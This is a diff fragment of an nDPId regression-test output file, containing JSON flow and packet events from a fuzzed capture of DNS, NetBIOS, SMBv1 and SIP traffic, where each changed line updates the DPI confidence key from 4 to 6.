{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470431657,"flow_last_seen":1120470431657,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470637551,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.5.2","src_port":53,"dst_port":2784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431656,"flow_last_seen":1120470431656,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470637551,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2784,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470448149,"flow_last_seen":1120470448149,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470637551,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456151,"flow_last_seen":1120470456151,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470637551,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.3","src_port":2786,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -896,20 +896,20 @@ 00594{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470457512,"flow_last_seen":1120470465524,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470637551,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1120470657808,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00692{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1120470657808,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1120470657808,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAADKXL8AAIARWOvAqAEpwKgB\/wCKAIoAtl+xEQKRTcCoASkAigCgAAAgRU1FQkVDREJEQkRCQ0FDQUNBQ0FDQUNBQ0FDQUNBQUEAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAABgAAAAAAAAAAAOgDAAAAAAAAAAAGAMEAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQTYAAAA"} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1120470657808,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1120470657808,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470657808,"l3_proto":"ip4","src_ip":"192.184.189.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1120470657808,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470657808,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAABOXMAAAIARWWbAuL0pwKgB\/wCJAIkAOmgjkU8BEAABAAAAAAAAIEZIRVBGQ0VMRUh2Q0VQRkZGQUNBQ0FDQUNBQ0FDQUJMAAAgAAE="} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470657808,"l3_proto":"ip4","src_ip":"192.184.189.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470657808,"l3_proto":"ip4","src_ip":"192.184.189.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470658556,"flow_last_seen":1120470658556,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470658556,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1120470658556,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470658556,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAABOXMEAAIARWWXAqAEpwKgB\/wCJAIkAOmgjkU8BEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0ElcwBMAAAgAAE="} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470658556,"flow_last_seen":1120470658556,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470658556,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470658556,"flow_last_seen":1120470658556,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470658556,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":467,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470659308,"flow_last_seen":1120470659308,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470659308,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"107.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1120470659308,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470659308,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAABOXMIAAIARWWTAqAEpa6gB\/wCJAIkAOmgjkU8BEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJMAAAgAAE="} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":467,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470659308,"flow_last_seen":1120470659308,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470659308,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"107.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":467,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470659308,"flow_last_seen":1120470659308,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470659308,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"107.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00692{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":2,"flow_last_seen":1120470662062,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1120470662062,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAADKXMMAAIARWOfAqAEpwKgB\/wCKAIqWtl+uEQKRUMCoASkAigCgAAAgRU1FQkVDREJEQkRCQ0FDQUNBQ0FDQUNBMEFDQUNBQUEAIEZIRVBGQ0dMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAABgAAAAAAAAAAAOgDAAAAAAAAAAAGAFYAAwABAAEAQgAXAFxNQUlMU7xPVFxCUk9XU0UACQTYAAAA"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470662062,"flow_last_seen":1120470662062,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470662062,"l3_proto":"ip4","src_ip":"115.0.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1120470662062,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470662062,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAABOXMQAAIARWSVzAAEpwKgB\/wCJAIkAOmggkVIBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJTAAAgAAE="} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470662062,"flow_last_seen":1120470662062,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470662062,"l3_proto":"ip4","src_ip":"115.0.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470662062,"flow_last_seen":1120470662062,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470662062,"l3_proto":"ip4","src_ip":"115.0.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":2,"flow_last_seen":1120470662812,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470662812,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAABOXMUAAIARWWHAqAEpwKgB\/wCJAIkAOGggkVIBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUM1Q0FDQUNBQ0FDQUJMAAAgAAE="} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":3,"flow_last_seen":1120470663563,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470663563,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAABOXMYAAIARWWDAqAEpwKgB\/wCJAIkAOmggkVIBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJMAAAgAAE="} 00692{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":3,"flow_last_seen":1120470666317,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1120470666317,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAADKXMcAAIARWOPAqAEpwKgB\/wCKAIoAtl+rEQKRU8CoASkAigCgAAAgRU1FQkVDREJEQkRCQ0FDQUNBQ0FDQUNBQ0FDQUNBQUEQIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAABMAAAAAAAAAAAAEQAABgAAQAAAAAAAAOgDAAAAAAAAAAAGAFYAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQTYAM8A"} @@ -920,8 +920,8 @@ 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":475,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470474627,"flow_last_seen":1120470482638,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470666318,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":476,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470670573,"flow_last_seen":1120470670573,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470670573,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.37.115","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1120470670573,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470670573,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFEABOXMsAAIARWVvAqAEpwKglcwCJAIkAOmUbkVcBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJPAAAgAAE="} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470670573,"flow_last_seen":1120470670573,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470670573,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.37.115","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470490782,"flow_last_seen":1120470490782,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1120470672075,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.37.115.0","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470670573,"flow_last_seen":1120470670573,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470670573,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.37.115","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470490782,"flow_last_seen":1120470490782,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1120470672075,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.37.115.0","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490640,"flow_last_seen":1120470490640,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470672075,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2790,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470492042,"flow_last_seen":1120470492042,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470672075,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470491041,"flow_last_seen":1120470491041,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470672075,"l3_proto":"ip4","src_ip":"192.168.79.2","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -929,80 +929,80 @@ 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":480,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1120470684859,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470684859,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa4UAAIARSsjAqAECwKiqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":481,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470685610,"flow_last_seen":1120470685610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470685610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 